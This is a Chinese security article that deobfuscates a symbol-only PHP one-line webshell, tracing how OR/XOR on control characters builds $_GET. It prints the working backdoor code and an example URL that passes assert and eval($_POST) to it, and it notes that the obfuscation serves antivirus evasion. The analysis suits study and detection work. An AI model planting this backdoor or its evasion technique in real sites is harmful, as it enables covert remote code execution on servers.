剖析PHP纯符号一句话webshell的代码

所属分类: 网络安全 / 漏洞分析 阅读数: 190
收藏 0 赞 0 分享


复制代码
代码如下:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
${'_'.$_}['_'](${'_'.$_}['__']);
?>

以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

第一行:$_="";
定义一个以下划线作为命名的字符变量:$_,赋值为空。
此行实际上不影响代码执行效果,仅增加混淆效果。

第二行:$_[+""]='';
定义一个$_数组元素,其key为+"",赋值为空。
众所周知,PHP是个弱类型语言,也就是说PHP并不严格验证变量类型,所以这里+""作为数组了key,其值等同于0,所以此行等同于$_[0]='';
此时$_被定义为数组,覆盖上一行的定义。

第三行:$_="$_"."";
将变量$_强制转换为字符串,因为此时$_类型为数组,强制转换后的结果为字符串"Array"(string(5) "Array" ),而非数组元素的值。

第四行:$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
这一行涉及到计算机二进制的“或运算”和“异或运算”,这里先简单介绍下这两种运算规则:
1、或运算,符号为 |
运算规则:0|0=0; 0|1=1; 1|0=1; 1|1=1;
简单来说,或运算前后两个对象 只要有 一个为1,其值就为1,否则为0
2、异或运算,符号为 ^
运算规则:0^0=0; 0^1=1; 1^0=1; 1^1=0;
简单来说,异或运算可以看成是判断前后两个对象是否相等的,如果两个对象不同(即为异),则值为1,否则为0

再回到代码上来,此行代码分三个部分($_[+""]|"")、($_[+""]|"")、($_[+""]^""),用连接符“.”号相连,每个部分都是其中两个对象进行"或运算"或"异或运算"。
先看第一部分($_[+""]|""),很明显,这里是$_[+""]和""这两个对象进行“或运算”。
第一个对象$_[+""](也就是$_[0]),要注意其值已经不是第二行定义的空值,因为在第三行时$_变量已经被覆盖定义为字符串“Array”。这里涉及到另一个php知识细节:对于 字符串[数字] 结构,字符串将会当成数组处理,返回以后面数字作为索引的元素值,例如:$x='abcd9.com',则$x[4]='9'。可见,$_[+""]值为字符串“Array”第一字符“A”。
第二个对象""是一个特殊字符(注意:这不是短横,虽然长得很像,实际上是个特殊字符,此类符号在某些环境下无法识别而作为乱码处理。后面两部分中的特殊字符也如此。),暂不管为什么此处是这个特殊字符而不是其他字符,先在此行下增加一行测试代码显示这一行定义的$_值:
var_dump($_);
测试结果为:string(3) "GET" ,可见,($_[+""]|"").($_[+""]|"").($_[+""]^"")值"GET",显而易见,($_[+""]|"")值为“G”,($_[+""]|"")值为“E”,($_[+""]^"")值为“T”。
再先看第一部分($_[+""]|"")值为"G",上面已得到$_[+""]值为“A”,即("A"|"")="G",下面分析下此等式:
“A”二进制:0100 0001
“G”二进制:0100 0111
0100 0001 | x = 0100 0111
通过或运算规则推导并参考ASCII码对照表,x值可能有以下几个结果:

复制代码
代码如下:

01000110 //ASCII可显示字符:F
01000111 //ASCII可显示字符:G
00000110 //ASCII控制字符:ACK,代表“确认回应”
00000111 //ASCII控制字符:BEL,代表“响铃”

代码中的""即为ASCII控制字符:ACK。其实另外三个字符也适用,为了增加混淆效果故采用这种特殊字符。
搞清楚第一部分,第二、第三部分也同理可推。

第五行:${'_'.$_}['_'](${'_'.$_}['__']);
此行可通过小括号分成两部分:${'_'.$_}['_'] 和 ${'_'.$_}['__'],两部分结构均是${A}['B'],区别仅是后面B是一条下划线还是两条小划线。
先看相同部分${'_'.$_},这里涉及到大括号{}在php中的特性一个:在变量间接引用中进行定界,如"$abc"为变量$abc,而"${a}bc"为变量$a连接字符"bc",了解了这一特性,而第四行对$_赋值为“GET”,可见${'_'.$_}即为变量$_GET,加上后面['_'],则为$_GET['_'],接收"get"的表单中的变量为'_'的值。小括号里的部分同理。
根据上面叙述,第五行代码还原后是:$_GET['_']($_GET['__']);

至此,这段混淆代码已原形毕露,一句话后门代码原形为:$_GET['_']($_GET['__']),传递特殊参数构建webshell链接网址(例如:http://www.test.com/webshell.php?_=assert&__=eval($_POST['a'])),通过一句话木马客户端即可连接此URL。

更多精彩内容其他人还在看

遨游已经修复的三个安全漏洞分析

在80sec通知遨游存在的安全漏洞之后,遨游于6.30号发布了新版的浏览器,修复了前面提到的安全漏洞,具体更新可以见http://blog.maxthon.cn/,此次更新修复了三个安全问题,主要的问题细节如下: 漏洞来源:http://www.80sec.com/relea
收藏 0 赞 0 分享

Z-blog跨站脚本攻击漏洞

漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带
收藏 0 赞 0 分享

世界之窗等浏览器本地xss跨域漏洞POC

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html   文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.
收藏 0 赞 0 分享

FoosunCMS Sql Injection Vulnerability

--== =================== www.nspcn.org ================= ==-- --== FoosunCMS (API_Response.asp) Remote SQL Injection Exploit ==-- --==
收藏 0 赞 0 分享

关于XSS漏洞另一个攻击趋势

XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件自身设计造成的XSS漏洞所暴发的威力有多么大! 通过类似的漏洞我测试了一个功能十足的浏览器木马,这个“
收藏 0 赞 0 分享

PHPCMS2.4中一个有趣的洞洞

今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看 打开一看发现是phpcms2.4,很旧的版本了~~ 搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧 挖了1个多小时,发现vote.php中有这样一段代码
收藏 0 赞 0 分享

Apple Safari KHTML WebKit远程拒绝执行服务漏洞

受影响系统: Apple Safari 2.0 不受影响系统: Apple Safari 3 描述: Safari是苹果家族操作系统默认所捆绑的WEB浏览器。 Safari处理畸形格式的HTML文档时存在漏洞,远程攻击者可能利用此漏洞导致
收藏 0 赞 0 分享

IBM Tivoli Storage Manager Express 堆溢出漏洞

受影响系统: IBM Tivoli Storage Manager Express 5.3 不受影响系统: IBM Tivoli Storage Manager Express 5.3.7.3 描述: Tivoli Storage Manage
收藏 0 赞 0 分享

MS08-001 - Windows TCP/IP中的漏洞可能允许远程执行代码(941644)

受影响软件: Microsoft Windows 2000 Service Pack 4 Windows XP Service Pack 2 Windows XP Professional x64 Edition和Windows XP Professional
收藏 0 赞 0 分享

Microsoft Visual Interdev 文件缓冲区溢出漏洞

受影响系统: Microsoft Visual InterDev 6.0 (SP6) 描述: Visual InterDev是微软为程序员设计的网页开发工具。 Visual InterDev在处理畸形格式的SLN文件时存在漏洞,远程攻击者可能利用此漏洞
收藏 0 赞 0 分享
查看更多